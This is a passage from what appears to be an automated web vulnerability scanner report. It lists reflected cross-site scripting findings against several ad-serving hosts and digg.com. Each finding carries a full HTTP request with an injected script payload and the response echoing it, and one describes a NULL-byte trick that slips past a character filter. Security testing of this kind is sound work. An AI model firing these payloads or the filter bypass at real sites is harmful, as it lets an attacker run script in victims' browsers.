This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /usersync?calltype=admeld&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=193&admeld_call_type=js&admeld_callback=http://tag.admeld.com/matched4bf'-alert(1)-'94e964e747d HTTP/1.1
Host: admeld.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/elephant/signup.phtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIImdYCEAoYAiACKAIw447n7QQQ447n7QQYAQ..; anj=Kfw))ByDuq(FJl:c9U(O<@CeVOmEXW1hL>#/*4Jn(uor=(5EBh5<W.k)Y><WiS:LOiybjU0r>wWIql]AvGq/IdS!acC(FaP$cYJ!J#h1Y$?7kmw?YIqgimiBWWi-dkyfpjFRO44ek(e!)zV^HsoI@m5(lVJ]-z44hi<@/+Gxw$#QV%Etka*a%eva$=@Au!AJSu6uj*@oO@]EL5n0EQo`R]:t/`eU_45K!c^VKH`O2$i'@`s.wMV-wH9)D=aab*.arK7xs@L$@.CbO?Kb?0ZuKR(FN+u4M#Er2:Iua<E_XvS:>yEy6m-9JBYXUm+V1/.@>oBLAQ/P^+8=*EjA[(GADvf*BbS#E1e?YTKA$'LPYDp0.fkASgZh0i(^P[N`AV7o.$d3BYa-u[VwBx:I(G/:381kcgHWoswb:=`Ku>u@Cidi%Y$u9`qSJ<7rlOS'j/U/>:p6qkC9x[=9>gzl!f)'vJRUdB!F`KgLFB[sgim_V^-4E!hC:TT[Mnnesvth<EqmD]T6X<+EXw*eL#7V._]eR7wKz#+Q<jY0)9m4.Ux(+g2x6gtKj2Uf7bK$d-7jQI=`H%cII=9QVL!LY6%gg!la[qizZ#JNdA3x'%jK#?C9j?>vs79'K>b2_7w$cAnjrNM]; sess=1; uuid2=2724386019227846218

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 03-May-2011 02:13:21 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 31-Jul-2011 02:13:21 GMT; domain=.adnxs.com; HttpOnly
Content-Type: application/x-javascript
Date: Mon, 02 May 2011 02:13:21 GMT
Content-Length: 183

document.write('<img src="http://tag.admeld.com/matched4bf'-alert(1)-'94e964e747d?admeld_adprovider_id=193&external_user_id=2724386019227846218&expiration=0" width="0" height="0"/>');

7.11. http://ads.adbrite.com/adserver/vdi/682865 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/682865

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5012f<script>alert(1)</script>20f68d8343f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserver/vdi/6828655012f<script>alert(1)</script>20f68d8343f?d=null&r=http%3A%2F%2Fuser.lucidmedia.com%2Fclicksense%2Fuser%3Fp%3D88436487f575811a%26r%3D0%26i%3D HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ads.adbrite.com
Cookie: Apache=168362101x0.883+1297102923x-1438991006; srh="1%3Aq64FAA%3D%3D"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3A12ggb"; rb2=EAE; fq="876fb%2C1uo0%7Clkjpza"

Response

HTTP/1.1 400 Bad Request
Accept-Ranges: none
Date: Mon, 02 May 2011 02:42:44 GMT
Server: XPEHb/1.0
Content-Length: 78

Unsupported URL: /adserver/vdi/6828655012f<script>alert(1)</script>20f68d8343f

7.12. http://ads.adbrite.com/adserver/vdi/682865 [r parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/682865

Issue detail

The value of the r request parameter is copied into the HTML document as plain text between tags. The payload ff129<script>alert(1)</script>f0a7e8f2d2f was submitted in the r parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /adserver/vdi/682865?d=null&r=ff129<script>alert(1)</script>f0a7e8f2d2f HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ads.adbrite.com
Cookie: Apache=168362101x0.883+1297102923x-1438991006; srh="1%3Aq64FAA%3D%3D"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3A12ggb"; rb2=EAE; fq="876fb%2C1uo0%7Clkjpza"

Response (redirected)

HTTP/1.1 400 Bad Request
Accept-Ranges: none
Date: Mon, 02 May 2011 02:37:48 GMT
Server: XPEHb/1.0
Content-Length: 123

Unsupported URL: /adserver/vdi/ff129<script>alert(1)</script>f0a7e8f2d2fMTY4MzYyMTAxeDAuODgzIDEyOTcxMDI5MjN4LTE0Mzg5OTEwMDY

7.13. http://ads.adbrite.com/adserver/vdi/684339 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/684339

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 698fa<script>alert(1)</script>fc949c569e7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserver/vdi/684339698fa<script>alert(1)</script>fc949c569e7?d=uuid%3D4d50384b-4b5e-0f67-919a-7275589c0b85 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Cookie: Apache=168362101x0.883+1297102923x-1438991006; srh="1%3Aq64FAA%3D%3D"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3A12ggb"; rb2=EAE; fq="876fb%2C1uo0%7Clkjpza"
Host: ads.adbrite.com

Response

HTTP/1.1 400 Bad Request
Accept-Ranges: none
Date: Mon, 02 May 2011 02:42:41 GMT
Server: XPEHb/1.0
Content-Length: 78

Unsupported URL: /adserver/vdi/684339698fa<script>alert(1)</script>fc949c569e7

7.14. http://ads.adbrite.com/adserver/vdi/711384 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/711384

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 537d5<script>alert(1)</script>eba3afc9f69 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserver/vdi/711384537d5<script>alert(1)</script>eba3afc9f69?d=c1e1301e-3a1f-4ca7-9870-f636b5f10e66&cb=4tv6lf&r=http%3A%2F%2Fa.triggit.com%2Fpxabcm%3Fabid%3D HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBj0x-yREyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2CjQKBjgwNjIwNRjAyYaZFSIkMGMyYWVkZTYtNmJiNi0xMWUwLThmZTYtMDAyNTkwMGE4ZmZlEAE; rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:742697:20828160:2931142961646634775:0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3A6e73"; fq="84fok%2C1uo0%7Clkigxp"; srh="1%3Aq64FAA%3D%3D"; ut="1%3AHc3LDoMgEIXhd5k1CwZaanwbUCqmFMulEnR895Juv%2F8k54RdwHjCy7a6pTnDCJNzwxK53gmjX8qbBBkWozxqh0Em3wHvLIuckPDTniGQJsRysOyt931lSt3oQcpINjmv1qZuofPMv70SBwZGh2DT%2Bj%2BE6%2FoB"; vsd=0@2@4dbe0f3a@loadus.exelator.com

Response

HTTP/1.1 400 Bad Request
Accept-Ranges: none
Date: Mon, 02 May 2011 02:13:08 GMT
Server: XPEHb/1.0
Content-Length: 78

Unsupported URL: /adserver/vdi/711384537d5<script>alert(1)</script>eba3afc9f69

7.15. http://ads.adbrite.com/adserver/vdi/711384 [r parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/711384

Issue detail

The value of the r request parameter is copied into the HTML document as plain text between tags. The payload 59a9c<script>alert(1)</script>a841d9665e9 was submitted in the r parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /adserver/vdi/711384?d=c1e1301e-3a1f-4ca7-9870-f636b5f10e66&cb=4tv6lf&r=59a9c<script>alert(1)</script>a841d9665e9 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBj0x-yREyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2CjQKBjgwNjIwNRjAyYaZFSIkMGMyYWVkZTYtNmJiNi0xMWUwLThmZTYtMDAyNTkwMGE4ZmZlEAE; rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:742697:20828160:2931142961646634775:0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3A6e73"; fq="84fok%2C1uo0%7Clkigxp"; srh="1%3Aq64FAA%3D%3D"; ut="1%3AHc3LDoMgEIXhd5k1CwZaanwbUCqmFMulEnR895Juv%2F8k54RdwHjCy7a6pTnDCJNzwxK53gmjX8qbBBkWozxqh0Em3wHvLIuckPDTniGQJsRysOyt931lSt3oQcpINjmv1qZuofPMv70SBwZGh2DT%2Bj%2BE6%2FoB"; vsd=0@2@4dbe0f3a@loadus.exelator.com

Response (redirected)

HTTP/1.1 400 Bad Request
Accept-Ranges: none
Date: Mon, 02 May 2011 02:06:50 GMT
Server: XPEHb/1.0
Content-Length: 120

Unsupported URL: /adserver/vdi/59a9c<script>alert(1)</script>a841d9665e9MTY4MzYyMDQ5eDAuMDQ5IDEzMDMwODM0NTB4NTQ0NjY5MDY4

7.16. http://ads.adbrite.com/adserver/vdi/762701 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/762701

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 52007<script>alert(1)</script>c5f391e0619 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserver/vdi/76270152007<script>alert(1)</script>c5f391e0619?d=978972DFA063000D2C0E7A380BFA1DEC HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://websiteprice.net/result/?id=65934
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:742697:20828160:2931142961646634775:0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; srh="1%3Aq64FAA%3D%3D"; rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBiI_srNEyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2CjQKBjgwNjIwNRjAyYaZFSIkMGMyYWVkZTYtNmJiNi0xMWUwLThmZTYtMDAyNTkwMGE4ZmZlEAE; b="%3A%3A12ggb%2C6e73"; ut="1%3AHY5LEoMgEAXvMmsWDEZDeRtQI1YmEMBPqePdg9l29et6J6wK2hPew76F1GdooXNOj1GalTHSOH9YsRXZqN7cwOnMyJJxCVLEWB1bobpKVDSsRVY5IeN3f3nPZYDzITINRMWy8xb4yY2tROeomfbm4Qvu5UJ3EgRY4%2F2Qpv8NuK4f"; vsd=0@2@4dbe115c@websiteprice.net; fq="7l04r%2C1uo0%7Clkjpsr%2C84fok%2C1uo0%7Clkigxp%2C83ol2%2C1uo0%7Clkjpss%2C826ke%2C1uo0%7Clkjpsr"

Response

HTTP/1.1 400 Bad Request
Accept-Ranges: none
Date: Mon, 02 May 2011 02:28:39 GMT
Server: XPEHb/1.0
Content-Length: 78

Unsupported URL: /adserver/vdi/76270152007<script>alert(1)</script>c5f391e0619

7.17. http://ads.adbrite.com/adserver/vdi/779045 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/779045

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 8c95c<script>alert(1)</script>c39d081d6c9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserver/vdi/7790458c95c<script>alert(1)</script>c39d081d6c9?d=17608843913132534 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ads.adbrite.com
Cookie: Apache=168362101x0.883+1297102923x-1438991006; srh="1%3Aq64FAA%3D%3D"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3A12ggb"; rb2=EAE; fq="876fb%2C1uo0%7Clkjpza"

Response

HTTP/1.1 400 Bad Request
Accept-Ranges: none
Date: Mon, 02 May 2011 02:43:06 GMT
Server: XPEHb/1.0
Content-Length: 78

Unsupported URL: /adserver/vdi/7790458c95c<script>alert(1)</script>c39d081d6c9

7.18. http://ads.adbrite.com/adserver/vdi/806205 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/806205

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 171e1<script>alert(1)</script>9b1cb3d1ccd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserver/vdi/806205171e1<script>alert(1)</script>9b1cb3d1ccd?d=3728e74c-7461-11e0-9185-00259009a9e4&r=http%3A//d.chango.com/m/s/AdBrite%3Fpartner_uid%3D HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ads.adbrite.com
Cookie: Apache=168362101x0.883+1297102923x-1438991006; srh="1%3Aq64FAA%3D%3D"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3A12ggb"; rb2=CjAKBjc2MjcwMRiS-_rNEyIgNDk1MjZCMUIzRkREMDNGQkMxNEREQzUwMDg5QkM4NTAKIQoGNzc5MDQ1GKeL-s0TIhExNzYwODg0MzkxMzEzMjUzNBAB; fq="876fb%2C1uo0%7Clkjpza%7Clkjpze%7Clkjpzs"; rb=0:762701:20861280:49526B1B3FDD03FBC14DDC50089BC850:0:779045:20861280:17608843913132534:0; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUipONEpJrDEszMlIS60xrDGoMSzNN1DSUUpKzMtLLcoEq1GqrQUA"

Response

HTTP/1.1 400 Bad Request
Accept-Ranges: none
Date: Mon, 02 May 2011 02:46:00 GMT
Server: XPEHb/1.0
Content-Length: 78

Unsupported URL: /adserver/vdi/806205171e1<script>alert(1)</script>9b1cb3d1ccd

7.19. http://ads.adbrite.com/adserver/vdi/806205 [r parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/806205

Issue detail

The value of the r request parameter is copied into the HTML document as plain text between tags. The payload c9203<script>alert(1)</script>12cc57e2eb0 was submitted in the r parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /adserver/vdi/806205?d=3728e74c-7461-11e0-9185-00259009a9e4&r=c9203<script>alert(1)</script>12cc57e2eb0 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ads.adbrite.com
Cookie: Apache=168362101x0.883+1297102923x-1438991006; srh="1%3Aq64FAA%3D%3D"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3A12ggb"; rb2=CjAKBjc2MjcwMRiS-_rNEyIgNDk1MjZCMUIzRkREMDNGQkMxNEREQzUwMDg5QkM4NTAKIQoGNzc5MDQ1GKeL-s0TIhExNzYwODg0MzkxMzEzMjUzNBAB; fq="876fb%2C1uo0%7Clkjpza%7Clkjpze%7Clkjpzs"; rb=0:762701:20861280:49526B1B3FDD03FBC14DDC50089BC850:0:779045:20861280:17608843913132534:0; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUipONEpJrDEszMlIS60xrDGoMSzNN1DSUUpKzMtLLcoEq1GqrQUA"

Response (redirected)

HTTP/1.1 400 Bad Request
Accept-Ranges: none
Date: Mon, 02 May 2011 02:40:30 GMT
Server: XPEHb/1.0
Content-Length: 123

Unsupported URL: /adserver/vdi/c9203<script>alert(1)</script>12cc57e2eb0MTY4MzYyMTAxeDAuODgzIDEyOTcxMDI5MjN4LTE0Mzg5OTEwMDY

7.20. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.bluelithium.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8f436"-alert(1)-"09796207443 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /st?ad_type=ad&ad_size=300x250&section=1521132&8f436"-alert(1)-"09796207443=1 HTTP/1.1
Host: ads.bluelithium.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/elephant/signup.phtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:10:11 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Mon, 02 May 2011 02:10:11 GMT
Pragma: no-cache
Content-Length: 4325
Age: 0
Proxy-Connection: close

/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "ad"; rm_url = "http://ads.bluelithium.com/imp?8f436"-alert(1)-"09796207443=1&Z=300x250&s=1521132&_salt=2629575304";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new A
...[SNIP]...

7.21. http://digg.com/tools/diggthis.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /tools/diggthis.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %004206e"><script>alert(1)</script>8e049f903a4 was submitted in the REST URL parameter 1. This input was echoed as 4206e"><script>alert(1)</script>8e049f903a4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Request

GET /tools%004206e"><script>alert(1)</script>8e049f903a4/diggthis.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: digg.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:44:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=-779404137262479208%3A203; expires=Tue, 03-May-2011 02:44:40 GMT; path=/; domain=digg.com
Set-Cookie: d=4613de18b6c542b61379940db09b5bbd6945796e3fc646c022194fedaff30823; expires=Sat, 01-May-2021 12:52:20 GMT; path=/; domain=.digg.com
X-Digg-Time: D=638324 10.2.129.49
Vary: Accept-Encoding
Cneonction: close
Content-Type: text/html;charset=UTF-8
Content-Length: 16999

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/tools%004206e"><script>alert(1)</script>8e049f903a4/diggthis.js.rss">
...[SNIP]...

7.22. http://digg.com/tools/diggthis.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /tools/diggthis.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00fac8d"><script>alert(1)</script>efc759f39a3 was submitted in the REST URL parameter 2. This input was echoed as fac8d"><script>alert(1)</script>efc759f39a3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Request

GET /tools/diggthis.js%00fac8d"><script>alert(1)</script>efc759f39a3 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: digg.com

Response

